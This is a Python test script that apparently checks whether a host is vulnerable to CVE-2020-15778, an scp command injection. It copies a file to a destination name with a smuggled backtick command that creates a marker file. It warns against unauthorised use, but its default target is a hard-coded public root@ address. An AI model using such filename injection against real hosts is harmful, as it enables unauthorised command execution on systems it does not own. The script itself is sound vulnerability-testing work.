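import os
import subprocess
import tempfile


def test_cve_2020_15778(remote_host="root@89.149.226.158"):
    """Check a host for CVE-2020-15778 (scp command injection).

    Copies a throwaway file with scp to a destination name that contains a
    backtick command substitution, then looks for the marker file that the
    substitution would create.

    WARNING: Do not use against systems you do not own or are not
    authorised to test.

    Limits of the check:

    * The command list is passed to scp without a local shell, so the
      backticks are not expanded on this machine; any expansion happens in
      the shell on the receiving side of the scp session.
    * The marker is looked up on the local filesystem only. A verdict is
      therefore meaningful only when ``remote_host`` resolves to this
      machine (for example ``user@localhost``).
    * A failed transfer (authentication, connectivity, or an scp that uses
      the SFTP protocol and rejects the literal path) leaves no marker
      either, so a non-zero scp exit status is reported as inconclusive
      instead of safe.

    Args:
        remote_host: scp destination in ``user@host`` form.
            NOTE(review): the default is a hard-coded public address; pass
            an explicit host you are authorised to test.
    """
    marker = "/tmp/cve2020-15778_poc"

    # Payload: destination name carrying a backtick command substitution.
    malicious_filename = f"`touch {marker}`file.txt"

    # A marker left behind by an earlier run would yield a false positive.
    if os.path.exists(marker):
        os.unlink(marker)

    # Create a temporary local file to scp.
    with tempfile.NamedTemporaryFile(delete=False) as tmp_file:
        tmp_file.write(b"POC test file for CVE-2020-15778\n")
        tmp_path = tmp_file.name

    print(f"[+] Testing SCP injection with malicious filename: {malicious_filename}")

    try:
        # Argument list, no shell=True: nothing here is expanded locally.
        cmd = ["scp", tmp_path, f"{remote_host}:{malicious_filename}"]
        result = subprocess.run(cmd, check=False)

        # Check if the payload executed (visible only on a shared filesystem).
        if os.path.exists(marker):
            print("[!] Vulnerable: Command injection executed (file created).")
        elif result.returncode != 0:
            print(
                f"[?] Inconclusive: scp exited with status {result.returncode} "
                "and no marker was created; rule out authentication or "
                "connectivity failures before treating the host as safe."
            )
        else:
            print("[+] Safe: Injection did not execute.")
    finally:
        os.unlink(tmp_path)
        if os.path.exists(marker):
            os.unlink(marker)


if __name__ == "__main__":
    # Change user@host if needed (must be a host you can SSH into)
    test_cve_2020_15778("user@localhost")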